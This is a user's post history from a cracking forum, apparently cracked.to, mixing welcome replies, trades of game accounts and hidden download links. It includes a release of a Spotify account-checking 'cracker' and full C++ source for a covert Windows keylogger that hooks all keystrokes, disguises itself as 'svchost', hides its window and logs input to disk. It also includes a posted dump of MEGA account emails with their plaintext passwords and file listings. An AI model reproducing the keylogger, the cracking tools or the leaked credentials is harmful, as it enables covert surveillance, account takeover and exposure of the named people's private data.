INTIBABYPUSHA
Members-
Content Count
149 -
Last visited
-
Days Won
1
Content Type
Profiles
Forums
Calendar
Gallery
Blogs
Store
Articles
Downloads
Classifieds
Everything posted by INTIBABYPUSHA
-
Hey, and welcome to the community my friend :fiesta:
-
Don't be a leecher :wut: [hide]https://pastr.io/view/5Zfn6Y[/hide]
-
Virustotal : https://www.virustotal.com/#/file/b5a77522fe3d997e190b02e676a9e503482da8946f9c791e7d9f8e01608360ca/detection [hide]https://www.sendspace.com/file/afrujt[/hide] DON'T BE A LEECHER :pepegun:
-
Spotify proxyless cracker for cracked.to
INTIBABYPUSHA replied to INTIBABYPUSHA's topic in Exclusive Releases
Do you like it ? ^^ -
Spotify proxyless cracker only captures premium hits. original by Raghav Jhavar Virustotal : https://www.virustotal.com/#/file/60b503139c190c7ac568f5b18dcce60a265d995ccb37d41eee1fda4cf71c175a/detection Jotti's Malwarescan : https://virusscan.jotti.org/de-DE/filescanjob/w1d3xggkgw [hide]https://www.sendspace.com/file/fin5ue[/hide] Don't be a leecher :pepegun:
-
[supreme] [Steam Account] [CS:GO] 15 Years, Level 31
INTIBABYPUSHA replied to Slotomillionaire's topic in Accounts
its cracked or? No i bought it on skeet.cc and it was not cracked i bought like 6 accs there xD -
[supreme] [Steam Account] [CS:GO] 15 Years, Level 31
INTIBABYPUSHA replied to Slotomillionaire's topic in Accounts
Bro no offense but 60 $ is way too much i bought mine lvl 100 for 50 $ but gl with it -
#include #include #include #include #define DEBUG 1 #define OUTFILE_NAME "Logs\\WinKey.log" /* Output file */ #define CLASSNAME "winkey" #define WINDOWTITLE "svchost" char windir[MAX_PATH + 1]; HHOOK kbdhook; /* Keyboard hook handle */ bool running; /* Used in main loop */ /** * \brief Called by Windows automagically every time a key is pressed (regardless * of who has focus) */ __declspec(dllexport) LRESULT CALLBACK handlekeys(int code, WPARAM wp, LPARAM lp) { if (code == HC_ACTION && (wp == WM_SYSKEYDOWN || wp == WM_KEYDOWN)) { static bool capslock = false; static bool shift = false; char tmp[0xFF] = {0}; std::string str; DWORD msg = 1; KBDLLHOOKSTRUCT st_hook = *((KBDLLHOOKSTRUCT*)lp); bool printable; /* * Get key name as string */ msg += (st_hook.scanCode << 16); msg += (st_hook.flags << 24); GetKeyNameText(msg, tmp, 0xFF); str = std::string(tmp); printable = (str.length() <= 1) ? true : false; /* * Non-printable characters only: * Some of these (namely; newline, space and tab) will be * made into printable characters. * Others are encapsulated in brackets ('[' and ']'). */ if (!printable) { /* * Keynames that change state are handled here. */ if (str == "CAPSLOCK") capslock = !capslock; else if (str == "SHIFT") shift = true; /* * Keynames that may become printable characters are * handled here. */ if (str == "ENTER") { str = "\n"; printable = true; } else if (str == "SPACE") { str = " "; printable = true; } else if (str == "TAB") { str = "\t"; printable = true; } else { str = ("[" + str + "]"); } } /* * Printable characters only: * If shift is on and capslock is off or shift is off and * capslock is on, make the character uppercase. * If both are off or both are on, the character is lowercase */ if (printable) { if (shift == capslock) { /* Lowercase */ for (size_t i = 0; i < str.length(); ++i) str[i] = tolower(str[i]); } else { /* Uppercase */ for (size_t i = 0; i < str.length(); ++i) { if (str[i] >= 'A' && str[i] <= 'Z') { str[i] = toupper(str[i]); } } } shift = false; } #ifdef DEBUG std::cout << str; #endif std::string path = std::string(windir) + "\\" + OUTFILE_NAME; std::ofstream outfile(path.c_str(), std::ios_base::app); outfile << str; outfile.close(); } return CallNextHookEx(kbdhook, code, wp, lp); } /** * \brief Called by DispatchMessage() to handle messages * \param hwnd Window handle * \param msg Message to handle * \param wp * \param lp * \return 0 on success */ LRESULT CALLBACK windowprocedure(HWND hwnd, UINT msg, WPARAM wp, LPARAM lp) { switch (msg) { case WM_CLOSE: case WM_DESTROY: running = false; break; default: /* Call default message handler */ return DefWindowProc(hwnd, msg, wp, lp); } return 0; } int WINAPI WinMain(HINSTANCE thisinstance, HINSTANCE previnstance, LPSTR cmdline, int ncmdshow) { /* * Set up window */ HWND hwnd; HWND fgwindow = GetForegroundWindow(); /* Current foreground window */ MSG msg; WNDCLASSEX windowclass; HINSTANCE modulehandle; windowclass.hInstance = thisinstance; windowclass.lpszClassName = CLASSNAME; windowclass.lpfnWndProc = windowprocedure; windowclass.style = CS_DBLCLKS; windowclass.cbSize = sizeof(WNDCLASSEX); windowclass.hIcon = LoadIcon(NULL, IDI_APPLICATION); windowclass.hIconSm = LoadIcon(NULL, IDI_APPLICATION); windowclass.hCursor = LoadCursor(NULL, IDC_ARROW); windowclass.lpszMenuName = NULL; windowclass.cbClsExtra = 0; windowclass.cbWndExtra = 0; windowclass.hbrBackground = (HBRUSH)COLOR_BACKGROUND; if (!(RegisterClassEx(&windowclass))) return 1; hwnd = CreateWindowEx(NULL, CLASSNAME, WINDOWTITLE, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 640, 480, HWND_DESKTOP, NULL, thisinstance, NULL); if (!(hwnd)) return 1; /* * Make the window invisible */ #ifdef DEBUG /* * Debug mode: Make the window visible */ ShowWindow(hwnd, SW_SHOW); #else ShowWindow(hwnd, SW_HIDE); #endif UpdateWindow(hwnd); SetForegroundWindow(fgwindow); /* Give focus to the previous fg window */ /* * Hook keyboard input so we get it too */ modulehandle = GetModuleHandle(NULL); kbdhook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)handlekeys, modulehandle, NULL); running = true; GetWindowsDirectory((LPSTR)windir, MAX_PATH); /* * Main loop */ while (running) { /* * Get messages, dispatch to window procedure */ if (!GetMessage(&msg, NULL, 0, 0)) running = false; /* * This is not a "return" or * "break" so the rest of the loop is * done. This way, we never miss keys * when destroyed but we still exit. */ TranslateMessage(&msg); DispatchMessage(&msg); } return 0; } g++ s.key.log.cpp -o keylogger ./a.out
-
[hide]https://www.sendspace.com/file/dwzivn[/hide] Don't be a leecher hit the green :pepegun:
-
Thanks :comfy:
-
Thanks :comfy:
-
Thanks :ezy:
-
200 $ for a combo :fappa:
-
@Ethan idk maybe something is with my export wrong
-
Welcome and have fun :D
-
Welcome, and have fun here
-
dont leech [align=center][hide][email protected]:sebo12345z | Quota = 15/50 GB | Number of files = 13 | File#1 = GameGuardian.8.5.8.apk | File#2 = CraftingDead.zip | File#3 = PVZ Garden Warfare | File#4 = Plants vs Zombies: Garden Warfare 2 by BlumeGameDownloads | File#5 = Plants vs Zombies: Garden Warfare 2 by BlumeGameDownloads.part1.rar | File#6 = Plants vs Zombies: Garden Warfare 2 by BlumeGameDownloads.part2.rar | File#7 = Plants vs Zombies: Garden Warfare 2 by BlumeGameDownloads.part3.rar | File#8 = Plants vs Zombies: Garden Warfare 2 by BlumeGameDownloads.part4.rar | File#9 = Plants vs Zombies: Garden Warfare 2 by BlumeGameDownloads.part5.rar | File#10 = Plants vs Zombies: Garden Warfare 2 by BlumeGameDownloads.part6.rar | [email protected]:uowy6rx5 | Quota = 37/50 GB | Number of files = 12369 | File#1 = BLACK DRAGON | File#2 = muzyka RAP | File#3 = ggg | File#4 = dziwne | File#5 = BLACK DRAGON | File#6 = SyncDebris | File#7 = 3947. ZIP Skład Chleb Powszedni (Reedycja 2010) 2010, album | File#8 = AK-47 - Pierwszy Dzień W Piekle (by deejot) (2015) | File#9 = Application Files | File#10 = nowe porbrane hentaje | File#11 = Andrchów 2014 - 20-12-2014 | File#12 = 2017-01-06 | File#13 = 2017-03-11 | File#14 = 2017-03-12 | File#15 = GIERKI | File#16 = Infinite Squirt Ver.1.02 | File#17 = WitchTrainer_1.6-all | File#18 = Witch_Trainer_1.02-win | File#19 = 10862652_754900347929960_859601937969871776_o.jpg | [email protected]:10082003 | Quota = 0/50 GB | Number of files = 3 | [email protected]:didavdbussche | Quota = 17/50 GB | Number of files = 80 | File#1 = MEGAsync | File#2 = My chat files | File#3 = pokemon | File#4 = Pokemon Mega Power v5.35 Complete.gba | File#5 = Afl.51 - Als Een Meteoor Naar De Top!.mp4 | File#6 = Afl.74 - De Eerste Ronde!.mp4 | File#7 = Afl.75 - Vuur En Ijs.mp4 | File#8 = Afl.76 - Het Vierde Ronde Gerommel.mp4 | File#9 = Afl.77 - Een Echte Vriend.mp4 | File#10 = Afl.78 - Zowel Vriend Als Vijand.mp4 | File#11 = Afl.79 - Vrienden Voor Het Leven.mp4 | File#12 = Afl.55 - Krab Doet De Sneasel.mp4 | File#13 = Afl.56 - Het Uur Van Het Vuur.mp4 | File#14 = Afl.58 - Erop Of Eronder.mp4 | File#15 = Afl.59 - De Banden Aanhalen.mp4 | File#16 = Afl.60 - In Het Heetst Van De Strijd.mp4 | File#17 = Afl.61 - Spelen Met Vuur.mp4 | File#18 = Afl.62 - Johto Foto Finish.mp4 | File#19 = Afl.63 - Ik Zie Je Later!.mp4 | [email protected]:czacha2002 | Quota = 0/50 GB | Number of files = 3 | [email protected]:suidoken123 | Quota = 39/50 GB | Number of files = 427 | File#1 = Gameforge Live | File#2 = Localisation | File#3 = NFSU2_Demo_Install | File#4 = Emotiplus_skype.exe | File#5 = Firefox Setup Stub 46.0.1.exe | File#6 = Firefox Setup Stub 46.0.1 (1).exe | File#7 = Firefox Setup Stub 48.0.1.exe | File#8 = Firefox Setup Stub 46.0.1 (2).exe | File#9 = Emotiplus_skype (1).exe | File#10 = JavaSetup8u91.exe | File#11 = ChromeSetup.exe | File#12 = NortonNSBUDownloader.exe | File#13 = UnityWebPlayer.exe | File#14 = UnityWebPlayer(1).exe | File#15 = 566234.png | File#16 = flashplayer21_ka_install(1).exe | File#17 = SteamSetup.exe | File#18 = SkypeSetup.exe | File#19 = wrar531fr.exe | [email protected]:lionking44 | Quota = 0/50 GB | Number of files = 1595 | File#1 = MEGAsync | File#2 = MW2 Bundle.rar | File#3 = MEGAsync Uploads | File#4 = Call of Duty Modern Warfare 2 IW4PLAY MP+SP ^^nosTEAM^^.torrent | File#5 = MEGAsync Uploads | File#6 = MEGAsync Uploads | File#7 = Call of Duty Modern Warfare 2 IW4PLAY MP+SP ^^nosTEAM^^.torrent | File#8 = MEGAsync Uploads | File#9 = Call of Duty Modern Warfare 2 IW4PLAY MP+SP ^^nosTEAM^^.torrent | File#10 = MEGAsync Uploads | File#11 = Call of Duty Modern Warfare 2 IW4PLAY MP+SP ^^nosTEAM^^.torrent | File#12 = MEGAsync Uploads | File#13 = Call of Duty Modern Warfare 2 IW4PLAY MP+SP ^^nosTEAM^^.torrent | File#14 = MEGAsync Uploads | File#15 = Call of Duty Modern Warfare 2 IW4PLAY MP+SP ^^nosTEAM^^.torrent | File#16 = MEGAsync Uploads | File#17 = Call of Duty Modern Warfare 2 IW4PLAY MP+SP ^^nosTEAM^^.torrent | File#18 = MEGAsync Uploads | File#19 = Call of Duty Modern Warfare 2 IW4PLAY MP+SP ^^nosTEAM^^.torrent | [email protected]:domo87 | Quota = 20/50 GB | Number of files = 641 | File#1 = Ultraviolence | File#2 = Born to Die [Vinyl] | File#3 = Born To Die (Paradise Edition) [Vinyl] | File#4 = Honeymoon [Vinyl] | File#5 = Talking Dreams (Deluxe Version) - Echosmith | File#6 = 01 Why.flac | File#7 = 1989 (Deluxe) | File#8 = Alabama Shakes - Sound & Color (2015) [24-44 HD FLAC] | File#9 = Avicii - AVĪCI (01) - EP (2017) [flac] | File#10 = Capital Cities - 2013 - In A Tidal Wave Of Mystery [FLAC] | File#11 = Daft Punk - Random Access Memories (2013) [FLAC] | File#12 = Demo Disk | File#13 = Ed Sheeran - ÷ (Deluxe) (2017) FLAC | File#14 = Fearless (Platinum Edition) | File#15 = Imagine Dragons - Evolve (2017) [24.44 FLAC] | File#16 = Imagine Dragons - Night Visions (2012) [FLAC] | File#17 = John Mayer - Battle Studies (2009) [FLAC] | File#18 = John Mayer - The Search for Everything (2017) [24-96 FLAC] | File#19 = Lana Del Rey - Lust For Life (2017) FLAC | [email protected]:altonalon | Quota = 3/50 GB | Number of files = 1244 | File#1 = Camera Uploads | File#2 = nautacolorfull1.zw | File#3 = nautacolorfull3.zw | File#4 = airforce_1_by_n_abakumov-d9niaxo.jpg | File#5 = nautacolorfull2.zw | File#6 = plantilla Anne diaz trilliarny.zw | File#7 = wallpaper.zip | File#8 = Personalizacion Marshmello.zip | File#9 = sliden Apps Marshallmello.zw | File#10 = marsmellow | File#11 = 2016-07-07 15.01.59.jpg | File#12 = 2016-07-07 15.02.39.jpg | File#13 = 2016-07-07 15.02.43.jpg | File#14 = 2016-07-07 16.01.02.png | File#15 = 2016-07-07 16.01.40.jpg | File#16 = 2016-07-07 16.11.07.jpg | File#17 = 2016-07-08 19.29.40.jpg | File#18 = 2016-07-08 23.03.48.jpg | File#19 = 2016-07-08 23.03.57.jpg | [/hide] [/align]
-
@Teken no shoot me in the face bitch
-
Sold not longer for sale
-
Thanks in sharingg Dont leech :ezy: :pepegun: